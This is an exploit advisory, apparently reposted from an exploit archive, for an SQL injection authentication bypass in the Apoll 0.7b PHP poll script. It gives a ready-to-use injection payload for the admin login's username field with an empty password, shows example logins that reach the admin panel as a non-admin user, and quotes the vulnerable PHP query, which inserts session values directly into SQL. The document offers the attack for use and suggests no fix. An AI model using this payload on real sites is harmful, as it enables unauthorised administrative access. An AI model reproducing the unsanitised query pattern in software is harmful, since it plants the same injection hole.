Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability

===========================================================
Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability
===========================================================


[~] Apoll version Remote Auth Bypass Vulnerability
[~]
[~] version: beta 0.7
[~]
[~] script dwonload: http://www.miticdjd.com/download/3/
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 03.11.2008
[~] 
[~] N0T: a.q kpss yuzden nete ara verebilirim : (
[~]
[~] -----------------------------------------------------------

admin login:

http://localhost/apoll/admin/index.php


Exploit:

username: [real_admin_or_user_name] ' or ' 1=1

password: dont write anything

note: generally admin name: admin 


example for my localhost:

admin: zorlu

user: salla



username: zorlu ' or ' 1=1

password: empty

or y added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )

username: salla ' or ' 1=1

password: empty 


file: 

apoll/admin/index.php

code:

$user = $_SESSION['user'];
$pass = $_SESSION['pass'];

$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");
	$num = @mysql_num_rows($mysql);




[~]----------------------------------------------------------------------




#  0day.today [2018-02-15]  #